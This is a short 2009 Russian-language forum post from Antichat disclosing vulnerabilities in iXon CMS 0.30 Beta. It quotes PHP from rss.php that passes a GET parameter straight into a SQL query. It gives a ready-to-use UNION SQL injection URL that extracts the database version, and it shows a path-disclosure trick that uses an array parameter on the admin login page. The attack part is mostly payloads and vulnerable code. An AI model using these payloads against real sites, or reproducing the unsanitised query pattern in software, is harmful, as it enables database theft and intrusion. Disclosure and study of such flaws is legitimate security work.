30.10.2009, 21:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iXon CMS
SQL
Уже по ходу любимый файл Rss.php
PHP код:
...
$id = $_GET['id'];
$post_data = get_all_post_data($id);
..
$result = mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC"); while ($comments = mysql_fetch_array($result))
...?>
http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex( version())),9,10--
ну и вроде в инете видел что было выложено LFI
банальное раскрытие путей как с htmlspecialchars
PHP код:
$redirect = 'login-control.php?redirect_to='.urlencode($_GET);
http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=
urlencode() expects parameter 1 to be string, array given in C:\AppServ\www\iXon_CMS 0.30 Beta\ixon-admin\login.php on line 35
Последний раз редактировалось HAXTA4OK; 30.10.2009 в 21:45..
|
|
|